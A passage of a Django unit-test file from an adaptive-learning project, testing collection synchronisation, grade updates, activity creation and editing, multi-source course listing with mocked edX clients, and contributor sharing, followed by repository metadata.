self.assertIn('back_url', detail_response.context)
self.assertEqual(detail_response.context['back_url'], self.back_url)
class TestManualSync(BridgeTestCase):
@patch('module.tasks.sync_collection_engines.delay')
@patch('module.tasks.sync_collection_engines.apply_async')
@patch('module.views.get_available_courses', return_value=([], []))
def test_immediate_synchronization(
self, mock_get_available_courses, mock_apply_async, mock_delay
):
expected_url = reverse('module:collection-detail', kwargs={'slug': self.collection1.slug}) + '?back_url=None'
url = reverse('module:collection-sync', kwargs={'slug': self.collection1.slug})
response = self.client.get(url)
mock_delay.assert_called_once_with(
created_at=Collection.objects.get(slug=self.collection1.slug).updated_at,
collection_slug=self.collection1.slug,
)
self.assertRedirects(response, expected_url)
@patch('module.tasks.sync_collection_engines.delay')
@patch('module.tasks.sync_collection_engines.apply_async')
@patch('module.views.get_available_courses')
def test_immediate_synchronization_incorrect_pk(
self, mock_get_available_courses, mock_apply_async, mock_delay
):
col_slug = '345'
url = reverse('module:collection-sync', kwargs={'slug': col_slug})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
class TestManualGradeUpdate(BridgeTestCase):
@patch('module.tasks.update_students_grades.delay')
def test_mandatory_students_grade_update(self, mock_delay):
expected_url = reverse('module:group-detail', kwargs={'group_slug': self.test_cg.slug}) + '?back_url=None'
url = reverse('module:update_grades', kwargs={'collection_order_slug': self.collection_order1.slug})
response = self.client.get(url)
mock_delay.assert_called_once_with(collection_order_slug=self.collection_order1.slug)
self.assertRedirects(response, expected_url)
def test_grade_update_with_incorect_group_slug(self):
url = reverse('module:update_grades', kwargs={'collection_order_slug': '3'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
class TestCreateUpdateActivity(BridgeTestCase):
fixtures = BridgeTestCase.fixtures + ['api.json', 'bridge.json']
@patch('module.tasks.sync_collection_engines.apply_async')
def setUp(self, mock_apply_async):
super().setUp()
self.back_url = reverse('module:collection-detail', kwargs={'slug': self.collection1.slug})
self.provider = LtiContentSource.objects.get(id=2)
self.add_url = reverse('module:activity-add', kwargs={'collection_slug': self.collection1.slug})
self.create_data = {
'name': 'Adapt 310',
'tags': '',
'atype': 'G',
'difficulty': '1',
'source_launch_url': (
'https://edx-staging-vpal.raccoongang.com/lti_lms_platform/courses/course-v1:MSFT+DAT222'
'x+4T2017/block-v1:MSFT+DAT222x+4T2017+type@problem+block@306986fde3e2489db9c97462dca19d4b'),
'source_name': 'Adapt 310',
'stype': 'problem',
'points': '0.5',
'repetition': 1,
'lti_content_source': self.provider.id,
}
@patch('module.tasks.sync_collection_engines.delay')
@patch('module.tasks.sync_collection_engines.apply_async')
@patch('module.views.get_available_courses')
def test_create_activity(self, *mocks):
activity_count = Activity.objects.count()
response = self.client.post(self.add_url, self.create_data)
if response.status_code == 200:
# form errors
print((response.context['form'].errors))
self.assertEqual(activity_count + 1, Activity.objects.count())
@patch('module.tasks.sync_collection_engines.delay')
@patch('module.tasks.sync_collection_engines.apply_async')
@patch('module.views.get_available_courses')
def test_update_activity(self, *mocks):
# create activity
self.test_create_activity(*mocks)
activity = Activity.objects.get()
activity_count = Activity.objects.count()
update_data = {
'name': 'ADOPT 100500',
'tags': 'some, tags, here',
'stype': 'video'
}
data = self.create_data.copy()
data.update(update_data)
url = reverse('module:activity-change', kwargs={'pk': activity.id, 'collection_slug': self.collection1.slug})
response = self.client.post(url, data)
self.assertEqual(activity_count, Activity.objects.count())
if response.status_code == 200:
# form errors
print((response.context['form'].errors))
new_activity = Activity.objects.get()
self.assertEqual(new_activity.name, update_data['name'])
self.assertEqual(new_activity.tags, update_data['tags'])
self.assertEqual(new_activity.stype, update_data['stype'])
class TestMultipleContentSources(BridgeTestCase):
fixtures = BridgeTestCase.fixtures + ['api.json', 'bridge.json']
@patch('module.tasks.sync_collection_engines.apply_async')
def setUp(self, mock_apply_async):
super().setUp()
@patch('api.backends.edx_api_client.OpenEdxApiClient.get_oauth_access_token',
return_value=('some_token', datetime.datetime.now() + datetime.timedelta(days=1)))
@patch('api.backends.edx_api_client.OpenEdxApiClient.get_provider_courses',
return_value=[{'name': 'name'} for _ in range(10)])
@patch('api.backends.base_api_client.BaseApiClient.get_provider_courses',
return_value=[{'name': 'name'} for _ in range(10)])
def test_list_courses_multiple_sources(
self,
mock_base_get_provider_courses,
mock_get_edx_provider_courses,
mock_get_edx_oauth_access_token
):
"""
Test count of courses from the multiple source.
"""
url = reverse('module:collection-detail', kwargs={'slug': self.collection1.slug})
response = self.client.get(url)
self.assertIn('source_courses', response.context)
self.assertTrue(response.context['source_courses'])
total_courses = len(response.context['source_courses'])
# we use 10 because mock function return list with size 10
expect_course_count = LtiContentSource.objects.all().count() * 10
self.assertEqual(total_courses, expect_course_count)
provider = LtiContentSource.objects.all().first()
provider.is_active = False
provider.save()
response = self.client.get(url)
self.assertIn('source_courses', response.context)
self.assertTrue(response.context['source_courses'])
new_total_courses = len(response.context['source_courses'])
self.assertNotEqual(new_total_courses, total_courses)
# we use 10 because mock function return list with size 10
self.assertEqual(new_total_courses, expect_course_count - 10)
class TestSharingModuleGroup(BridgeTestCase):
@patch('module.tasks.sync_collection_engines.apply_async')
def setUp(self, mock_apply_async):
super().setUp()
self.contributor_1 = BridgeUser.objects.create_user(
username='test_contributor_1',
password='test_contributor_1',
email='test_contributor_1@test.com'
)
self.contributor_2 = BridgeUser.objects.create_user(
username='contributor_2',
password='contributor_2',
email='contributor_2@test.com'
)
self.test_cg = ModuleGroup.objects.create(
name='TestColGroup',
owner=self.user,
)
ContributorPermission.objects.create(user=self.contributor_1, group=self.test_cg)
def test_add_contributor(self):
url = reverse('module:group-share', kwargs={'group_slug': self.test_cg.slug})
data = {
"contributor_username": self.contributor_2.username
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 200)
self.assertTrue(self.test_cg.contributors.filter(username=self.contributor_2.username).exists())
def test_delete_contributor(self):
url = reverse(
'module:group-share-remove',
kwargs={'group_slug': self.test_cg.slug, 'username': self.contributor_1.username}
)
response = self.client.get(url)
self.assertRedirects(response, reverse('module:group-detail', kwargs={'group_slug': self.test_cg.slug}))
self.assertFalse(self.test_cg.contributors.filter(username=self.contributor_1.username).exists())
| {
"content_hash": "663fe6089620e75eed9ea51f5ed9eefb",
"timestamp": "",
"source": "github",
"line_count": 572,
"max_line_length": 117,
"avg_line_length": 44.57167832167832,
"alnum_prop": 0.6407138654638165,
"repo_name": "harvard-vpal/bridge-adaptivity",
"id": "64bf31ef0864dd09cdc945040d603d7b12a6cbc8",
"size": "25495",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bridge_adaptivity/module/tests/test_views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2514"
},
{
"name": "Dockerfile",
"bytes": "1586"
},
{
"name": "HTML",
"bytes": "70921"
},
{
"name": "JavaScript",
"bytes": "29636"
},
{
"name": "Makefile",
"bytes": "1614"
},
{
"name": "Python",
"bytes": "315506"
},
{
"name": "Shell",
"bytes": "242"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.